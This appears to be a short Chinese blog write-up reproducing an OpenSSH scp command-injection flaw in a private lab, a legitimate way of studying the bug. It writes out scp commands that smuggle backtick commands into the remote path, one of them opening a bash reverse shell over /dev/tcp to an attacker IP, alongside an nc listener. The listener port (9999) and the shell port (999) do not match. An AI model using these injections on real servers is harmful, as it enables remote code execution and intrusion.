這個漏洞之前見過很多次,苦於大佬博客看不懂,今天看着我薛哥博客,哦豁,精湛,我也復現一下吧。
談談個人理解,openssh這個東西就是 開了22號端口的那個 ssh 看圖
是吧,openSSH_7.41,這個是我之前安裝的版本,而且我們在學習centos時,關於ssh 可能有人用過 scp ,這個是可以通過ssh傳輸文件的,之前我學習到這個命令時還做筆記了,復現漏洞的時候就覺得這個命令眼熟,沒想到這個命令會存在漏洞。(個人說法不嚴謹,見諒)
據大佬說這個漏洞影響版本:OpenSSH =< 8.3p1
ok廢話不多說,開練。
1、事先准備的環境
靶機centos7 :172.16.12.147
攻擊機kali :172.16.12.145
(值得一提:這個漏洞需要提前知道ssh密碼。。。哈哈,這個是因為有的ssh知道密碼也連不上,所以就有了通過scp執行命令了。)
注:如果有ssh沒裝的,rpm -qa | grep openssh 查看是否安裝了ssh服務;
安裝ssh:yum install openssh
ssh-keygen -t rsa 回車,在root下會生成一個隱藏文件夾 .ssh
ls -al 就可以看到倆個秘鑰文件,一個公鑰一個私鑰。。關於這個我得博客園還寫過一道關於私鑰泄露的ctf題。
2、嘗試通過scp寫入文件
在當前位置隨便創建一個文件,cmd.txt
使用scp命令拷貝文件:
scp cmd.txt root@172.16.12.147:'`touch /tmp/ccc.txt` /tmp'

ok,kali機這邊顯示正常,那看下centos機/tmp目錄下有沒有新建進來
正常寫進來了。
3、使用nc反彈shell
在kali機上=》命令:nc -lvp 9999

在kali機上新建窗口 =》反彈shell命令:
scp cmd.txt root@172.16.12.147:'`bash -i >& /dev/tcp/172.16.12.145/999 0>&1`/tmp/shell.txt'

完。
所有的故事從基石開始;山河遠闊,人間煙火,星河錯落,無一是你,無一不是你。
閱讀此文的皆是經天緯地之才,氣吞山河之志,上知天文下知地理,通宵古今學貫中西超凡脫俗之人。